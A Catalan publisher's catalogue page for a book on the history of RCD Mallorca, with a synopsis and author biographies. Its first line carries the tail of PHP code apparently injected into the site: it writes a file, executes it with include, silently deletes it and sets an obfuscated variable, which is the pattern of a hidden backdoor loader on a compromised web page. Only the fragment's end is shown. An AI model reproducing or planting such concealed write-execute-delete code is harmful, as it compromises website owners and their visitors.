");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Edicions Documenta Balear - Història del RCD Mallorca (1916-2004)
Cercador d'Obres
ORDENAR:
Començar recerca

Història del RCD Mallorca (1916-2004)

Vidal Perelló, Miquel; Vidal Reynés, Jordi

Prologuista:
Alemany Font, Mateu
Col·lecció:
Arbre de Mar
Tema:
Història contemporània
Pàgines:
284
PVP:
27.00
ISBN:
84-96376-16-8
Data d'Edició:
11/02/2005
Sinopsi
Aquesta història del Reial Mallorca, la primera publicada en llengua catalana, va adreçada tant als estudiosos de l'esport com als aficionats al futbol, i és el resultat de la sàvia col·laboració entre un periodista i un historiador, que han sabut conjugar les seves habilitats per redactar d'una manera amena i documentada els esdeveniments futbolístics dels darrers noranta anys. Profusament il·lustrada, l’obra es divideix en sis capítols, que repassen cronològicament les diverses etapes viscudes per una entitat que molts de mallorquins tenen en gran estima, des de la fundació de l'Alfonso XIII fins a la conversió del RCD Mallorca en una societat anònima esportiva, fent un complet repàs a les plantilles, les directives, les anècdotes, les alegries i les amargors que s'han succeït des de l'any 1916, data de la fundació del club. Un apèndix documental, una antologia de textos i una completa bibliografia tanquen aquest volum que esdevindrà, sens dubte, un punt de referència en la història de l'esport a les Illes Balears.
Miquel Vidal Perelló
(Consell, 1942)
És un periodista amb una llarga carrera al darrera i reconeguda solvència en temes esportius. ha estat director-fundador del Diario As i col·laborador habitual dels diaris Última Hora, Baleares i Diario de Mallorca. Ha publicat diversos llibre sobre figures senyeres de l’esport balear, centrats sobretot en el ciclisme i el futbol.
Jordi Vidal Reynés
(Jerez, 1965)
Llicenciat en història (UIB, 1988), professor d’en­senyament secundari, poeta, escriptor i investigador. Ha publicat Història del RCD Mallorca amb Miguel Vidal (2005) i Dentista de cocodrilos (2007). Ha tingut cura d’Arquitectura i art a Mallorca, antologia de textos de Guillem Reynés Font (2006), i, amb Antoni Nadal, d’Els pioners de la industrialització a les illes balears i altres escrits, de Ferran Pujalte (2008). Ha coordinat els números de la revista Estudis Baleàrics dedicats a Josep Font i Trias (2007) i als cent anys de l’aviació a Mallorca (2010). Ha publicat articles en el Bolletí de la Societat Arqueològica Lul·liana (BSAL), Estudis Baleàrics, Lluc, El Mirall, Temps Moderns, Eivissa, i El Pitiús. Fou col·laborador d’El Mundo-El Día de Baleares (2001-2008) i d’IB3 Ràdio (2007-2013).
Ha participat en diferents seminaris, congressos i jornades d’estudis locals (Palma, Inca, Santa Maria, Pollença). Ha col·laborat com a redactor en la Gran enciclopèdia de Mallorca i en l’elaboració del Catàleg de Publicacions periòdiques de Mallorca del Departament d’Història de la UIB. El 1998 fou becat pel Consell de Mallorca com a ponent en les jornades “Mallorca entre dos segles”.
És membre de la Societat Arqueològica Lul·liana, de l’Institut d’Estudis Eivissencs i col·laborador del Grup d’Estudi de la Cultura, la Societat i la Política al Món Contemporani (UIB). Formà part del Comitè organitzador d’Exfilna 2007 i de la comissió del Centenari de l’Escola Graduada de Palma (1910-2010).Recomanar
Comentar
Comentaris (0)